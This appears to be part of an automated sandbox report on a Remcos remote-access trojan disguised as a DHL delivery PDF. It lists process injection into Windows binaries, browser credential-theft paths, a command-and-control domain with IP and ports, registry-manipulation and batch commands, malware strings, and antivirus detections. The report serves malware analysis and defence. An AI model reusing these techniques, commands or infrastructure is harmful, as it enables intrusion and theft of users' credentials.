              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3210000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3220000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3230000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3240000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3250000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3260000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3270000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 50600000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3280000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3290000Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3010000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3020000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3030000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3040000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3050000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3060000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3070000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 50600000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F50000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F60000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F70000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3200000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3210000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3220000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3230000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3240000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3250000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3260000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3270000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3280000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3290000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2C80000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D40000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D80000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2DA0000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D50000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3010000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3050000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3070000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 2F70000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 3230000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 3270000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 3290000
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe 22_2_0040F4B7
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00414923 StrToIntA,mouse_event, 22_2_00414923
Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW, 5_2_00441069
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW, 5_2_00449143
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_0044926C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW, 5_2_00449373
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW, 22_2_00441069
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW, 22_2_00449143
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 22_2_0044926C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoW, 22_2_00449373
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 22_2_00449440
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: GetLocaleInfoA, 22_2_0040D585
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F2AB cpuid 5_2_0042F2AB
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004410D3 GetSystemTimeAsFileTime, 5_2_004410D3
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044190C _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 22_2_0044190C
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004166F6 GetComputerNameExW,GetUserNameW, 5_2_004166F6

              Stealing of Sensitive Information:

Yara detected Remcos RAT
Source: Yara match | File source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 22_2_0040A3AF
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: \key3.db 22_2_0040A3AF
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 5_2_0040A291
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 22_2_0040A291

              Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match | File source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
Detected Remcos RAT
Source: mobsync.exe | String found in binary or memory: Remcos_Mutex_Inj
Source: mobsync.exe, 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
Source: mobsync.exe | String found in binary or memory: Remcos_Mutex_Inj
Source: mobsync.exe, 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: Remcos_Mutex_Inj
Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: cmd.exe 22_2_0040559D

              Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Native API 1 | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 1 | Scripting 1 | Input Capture 11 | Account Discovery 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Process Injection 322 | Obfuscated Files or Information 2 | Credentials In Files 2 | File and Directory Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Masquerading 11 | NTDS | System Information Discovery 33 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Modify Registry 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 21 | Cached Domain Credentials | Security Software Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 21 | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Virtualization/Sandbox Evasion 21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 322 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |

              Behavior Graph

Legend (graph image not reproduced): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Behavior Graph ID: 491719 | Sample: ENTREGA DE DOCUMENTOS DHL _... | Startdate: 27/09/2021 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: ongod4ever.ddns.net
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Icon mismatch, binary includes an icon from a different legit application in order to fool users; 6 other signatures
  Started processes: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe (node 9, 1 22); Iqzenco.exe (node 14, 15); Iqzenco.exe (node 16, 15)

ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe (node 9)
  DNS/IP: sn-files.fe.1drv.com; onedrive.live.com; bl30uw.sn.files.1drv.com
  Dropped file: C:\Users\Public\Libraries\...\Iqzenco.exe, PE32
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
  Started processes: mobsync.exe (node 18, 2); cmd.exe (node 22, 1); cmd.exe (node 24, 1)

Iqzenco.exe (node 14)
  DNS/IP: sn-files.fe.1drv.com; 2 other IPs or domains
  Signatures: Multi AV Scanner detection for dropped file
  Started processes: mobsync.exe (node 26)

Iqzenco.exe (node 16)
  DNS/IP: sn-files.fe.1drv.com; 2 other IPs or domains
  Started processes: secinit.exe (node 28)

mobsync.exe (node 18)
  DNS/IP: ongod4ever.ddns.net 185.140.53.15, ports 49771, 49774, 49775, DAVID_CRAIGGG Sweden; 192.168.2.1 unknown unknown
  Signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to steal Firefox passwords or cookies; Delayed program exit found

cmd.exe (node 22)
  Started processes: reg.exe (node 30, 1); conhost.exe (node 32)

cmd.exe (node 24)
  Started processes: cmd.exe (node 34, 1); conhost.exe (node 36)

reg.exe (node 30)
  Started processes: conhost.exe (node 38)

cmd.exe (node 34)
  Started processes: conhost.exe (node 40)


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | 26% | Virustotal |
ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | 24% | ReversingLabs | Win32.Backdoor.Remcos

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | 24% | ReversingLabs | Win32.Backdoor.Remcos

              Unpacked PE Files

Source | Detection | Scanner | Label
0.0.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.0.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.1.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.2.mobsync.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
0.1.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.mobsync.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
26.2.secinit.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
16.0.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.1.Iqzenco.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
ongod4ever.ddns.net | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ongod4ever.ddns.net | 185.140.53.15 | true | false | | high
onedrive.live.com | unknown | unknown | false | | high
bl30uw.sn.files.1drv.com | unknown | unknown | false | | high

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
ongod4ever.ddns.net | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
